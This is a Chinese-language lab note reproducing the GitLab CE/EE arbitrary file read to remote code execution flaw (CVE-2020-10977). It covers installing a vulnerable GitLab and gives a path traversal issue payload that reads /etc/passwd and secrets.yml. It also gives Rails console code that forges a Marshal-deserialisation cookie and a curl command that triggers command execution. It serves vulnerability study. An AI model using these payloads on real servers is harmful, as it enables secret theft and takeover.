CVE-2020-10977-GITLAB CE/EE 任意文件读取导致远程命令执行漏洞-环境搭建及完整复现图文详细笔记
漏洞环境搭建-CENTOS7
1.安装依赖软件
yum -y install policycoreutils openssh-server openssh-clients postfix
2.设置postfix开机自启,并启动,postfix支持gitlab发信功能(对漏洞环境应该不重要)
systemctl enable postfix && systemctl start postfix
3.下载gitlab安装包,然后安装
官方下载:
CE下载地址:https://packages.gitlab.com/gitlab/gitlab-ce
EE下载地址:https://packages.gitlab.com/gitlab/gitlab-ee
清华开源镜像站下载:
centos 6系统的下载地址:https://mirrors.tuna.tsinghua.edu.cn/gitlab-ce/yum/el6
centos 7系统的下载地址:https://mirrors.tuna.tsinghua.edu.cn/gitlab-ce/yum/el7
漏洞版本范围在>=8.5,<=12.9
(ps:测试9.5.0的版本时没有找到move issue功能。查看当前gitlab版本命令:cat
/opt/gitlab/embedded/service/gitlab-rails/VERSION)
下载rpm包并安装:
wget https://mirrors.tuna.tsinghua.edu.cn/gitlab-ce/yum/el7/gitlab-ce-9.5.0-ce.0.el7.x86_64.rpm
rpm -i gitlab-ce-9.5.0-ce.0.el7.x86_64.rpm
4.修改gitlab配置文件指定服务器ip和自定义端口
vim /etc/gitlab/gitlab.rb
这里我设置了8888端口
5.重置并启动Gitlab
执行以下命令
gitlab-ctl reconfigure
gitlab-ctl restart
显示成功启动之后,访问端口进入Gitlab页面,提示修改root密码
PS:若出现502页面,多次刷新页面即可,这是由于Gitlab性能要求比较高,服务器响应慢导致的,推荐虚拟机内存至少分配4G。
漏洞复现
测试版本为gitlab-12.8.7-ce
任意文件读取
0x001 新建两个测试项目
0x002 在其中一个project中创建新的issue,在其问题描述中输入下方代码,然后提交
![a](/uploads/11111111111111111111111111111111/../../../../../../../../../../../../../../etc/passwd)
0x003 创建issue成功后点击move issue,将它移动到test2中
0x004 test2中的issue中带了一个password附件
0x005 点击下载password附件,用记事本方式打开,发现其内容就是/etc/password的内容
RCE(REMOTE COMMAND/CODE EXECUTE)
0x001 利用任意文件读取漏洞,下载/opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml文件,获取secret_key_base
0x002 问题描述中输入:
![a](/uploads/11111111111111111111111111111111/../../../../../../../../../../../../../../opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml)
0x003 下载secrets.yml,获取secret_key_base
0x004 在自己的攻击机上搭建一个gitlab环境(详见环境搭建笔记),将目标机下载下来的secerts.yml覆盖在自己攻击机上/opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml
(也可以只替换secret_key_base)
0x005 使用gitlab-rails console执行以下命令
gitlab-rails console #进入rails console
- 1
依次输入:
request = ActionDispatch::Request.new(Rails.application.env_config)
request.env["action_dispatch.cookies_serializer"] = :marshal
cookies = request.cookie_jar
erb = ERB.new("<%= `echo flag was here > /tmp/flag` %>")
depr = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new(erb, :result, "@result", ActiveSupport::Deprecation.new)
cookies.signed[:cookie] = depr
puts cookies[:cookie]
0x006 获取cookie,构造语句:
curl -vvv 'http://192.168.1.86:8888/users/sign_in' -b "experimentation_subject_id=cookie"
(ps:experimentation_subject_id参数输入rail console获取的cookie值)
通过任意文件读取下载/tmp/flag文件,内容:“flag was here”,说明命令执行成功!
想了解更多可以查看漏洞博客
参考:https://hackerone.com/reports/827052